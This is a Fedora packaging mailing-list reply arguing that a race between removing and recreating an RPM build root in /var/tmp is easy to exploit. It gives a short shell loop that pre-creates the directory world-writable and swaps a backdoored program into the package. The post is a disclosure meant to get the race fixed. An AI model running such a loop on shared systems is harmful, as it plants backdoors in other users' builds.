"Tom 'spot' Callaway" <tcallawa@xxxxxxxxxx> writes:
>> Someone could pre-make the build root in between the rm and mkdir
>> calls.
>
> Erm, ok. In the buildsystem, this should never happen (hooray mock), but
> when building on a multi-user system, I can see the remote possibility.
> However, we're talking about someone performing an operation in a very
> tiny gap.
No; should be trivial to exploit with:
$ create-big-load &
$ d=/var/tmp/foo-package-root-512
$ while test ! -e "$d"/bin/prog; do rm -rf "$d"; mkdir -m0777 -p "$d"/bin; done; \
rm -f "$d/bin/prog"; cp -a my-backdoored-prog "$d/bin/prog"
[ the while-loop should be implemented in C ]
Enrico
Attachment:
pgphSCbLfDDjd.pgp
Description: PGP signature
-- Fedora-packaging mailing list Fedora-packaging@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-packaging
